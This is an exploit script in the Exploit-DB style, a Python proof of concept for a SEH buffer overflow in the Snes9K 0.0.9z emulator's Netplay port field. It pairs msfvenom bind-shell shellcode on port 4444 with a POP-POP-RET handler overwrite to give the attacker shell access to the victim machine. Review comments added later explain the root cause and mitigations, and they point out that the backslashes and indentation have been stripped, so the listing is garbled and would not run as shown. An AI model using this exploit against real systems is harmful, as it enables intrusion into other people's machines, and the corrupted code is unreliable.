# Exploit Title: Snes9K 0.0.9z - Buffer Overflow (SEH)
# Date: 2018-10-13
# Exploit Author: Abdullah AlA+-ASS
# Vendor Homepage: https://sourceforge.net/projects/snes9k/
# Software Link: https://sourceforge.net/projects/snes9k/files/latest/download
# Version: 0.0.9z
# Tested on: Windows XP Professional sp3(ENG)
# Category: Windows Local Exploit
# How to use: open the program, go to "Netplay --> Options", paste the contents of boom.txt
# into Socket Port Number --> connect to the victim machine on port 4444
#!/usr/bin/python

#msfvenom -p windows/shell_bind_tcp -b "x00x0ax0dx9fx8fx8ex8dx9ex9dxd0xddxfdxfexf0xde" -f python
#352 bytes
# --- Shellcode blob (Python 2 script: note the `print` statement syntax below) ---
# NOTE(review): every string literal in this listing has lost its backslashes
# ("x2bxc9..." instead of "\x2b\xc9..."), an extraction artifact. As shown, the
# script writes plain ASCII text rather than the byte sequence the msfvenom
# comment above describes, so the byte counts in the header do not apply to
# this copy of the file.
buf = ""
buf += "x2bxc9x83xe9xaexe8xffxffxffxffxc0x5ex81"
buf += "x76x0ex43x2bx2ax41x83xeexfcxe2xf4xbfxc3"
buf += "xa8x41x43x2bx4axc8xa6x1axeax25xc8x7bx1a"
buf += "xcax11x27xa1x13x57xa0x58x69x4cx9cx60x67"
buf += "x72xd4x86x7dx22x57x28x6dx63xeaxe5x4cx42"
buf += "xecxc8xb3x11x7cxa1x13x53xa0x60x7dxc8x67"
buf += "x3bx39xa0x63x2bx90x12xa0x73x61x42xf8xa1"
buf += "x08x5bxc8x10x08xc8x1fxa1x40x95x1axd5xed"
buf += "x82xe4x27x40x84x13xcax34xb5x28x57xb9x78"
buf += "x56x0ex34xa7x73xa1x19x67x2axf9x27xc8x27"
buf += "x61xcax1bx37x2bx92xc8x2fxa1x40x93xa2x6e"
buf += "x65x67x70x71x20x1ax71x7bxbexa3x74x75x1b"
buf += "xc8x39xc1xccx1ex43x19x73x43x2bx42x36x30"
buf += "x19x75x15x2bx67x5dx67x44xd4xffxf9xd3x2a"
buf += "x2ax41x6axefx7ex11x2bx02xaax2ax43xd4xff"
buf += "x2bx4bx72x7axa3xbex6bx7ax01x13x43xc0x4e"
buf += "x9cxcbxd5x94xd4x43x28x41x52x77xa3xa7x29"
buf += "x3bx7cx16x2bxe9xf1x76x24xd4xffx16x2bx9c"
buf += "xc3x79xbcxd4xffx16x2bx5fxc6x7axa2xd4xff"
buf += "x16xd4x43x5fx2fx0ex4axd5x94x2bx48x47x25"
buf += "x43xa2xc9x16x14x7cx1bxb7x29x39x73x17xa1"
buf += "xd6x4cx86x07x0fx16x40x42xa6x6ex65x53xed"
buf += "x2ax05x17x7bx7cx17x15x6dx7cx0fx15x7dx79"
buf += "x17x2bx52xe6x7exc5xd4xffxc8xa3x65x7cx07"
buf += "xbcx1bx42x49xc4x36x4axbex96x90xdaxf4xe1"
buf += "x7dx42xe7xd6x96xb7xbex96x17x2cx3dx49xab"
buf += "xd1xa1x36x2ex91x06x50x59x45x2bx43x78xd5"
buf += "x94"

# SEH record overwrite: `nseh` is the 4-byte next-SEH field, `seh` is the
# handler address the author attributes to a POP-POP-RET gadget in
# msacm32.drv on the tested Windows XP SP3 build (see header). The address
# is presumably only stable because that module is loaded at a fixed base
# and lacks SafeSEH — not verifiable from this listing. The defender-side
# reading is that a module compiled with /SAFESEH (and, on later Windows,
# ASLR) would not offer this handler.
nseh= "xebx06x90x90"
seh = "x39x1fxd1x72" #POP-POP-RET msacm32.drv

# Buffer layout: 244 filler bytes to reach the exception registration record,
# then nSEH, SEH, the shellcode blob, and 20 trailing filler bytes. The 244
# offset is specific to the build named in the header; it cannot be checked
# here.
# Root cause / mitigation (from the header's "How to use"): the "Socket Port
# Number" field in Netplay --> Options is copied without a length bound. A
# port number never exceeds five decimal digits, so length-validating that
# field before use removes the overflow; a several-hundred-byte value in that
# setting is also an easy anomaly to log.
buffer = "x90" * 244 + nseh + seh + buf + "x90"*20

payload = buffer
# NOTE(review): the try/except body has lost its indentation in this listing,
# so the block below is a SyntaxError as shown. Independently of that, the
# bare `except:` swallows every exception (KeyboardInterrupt and SystemExit
# included) and masks the real reason the file could not be written, and the
# handle opened on the `f=open(...)` line is never closed if `write()`
# raises. The conventional form is `with open("boom.txt", "w") as f:` and
# `except IOError` (Python 2) / `except OSError` (Python 3).
try:
f=open("boom.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"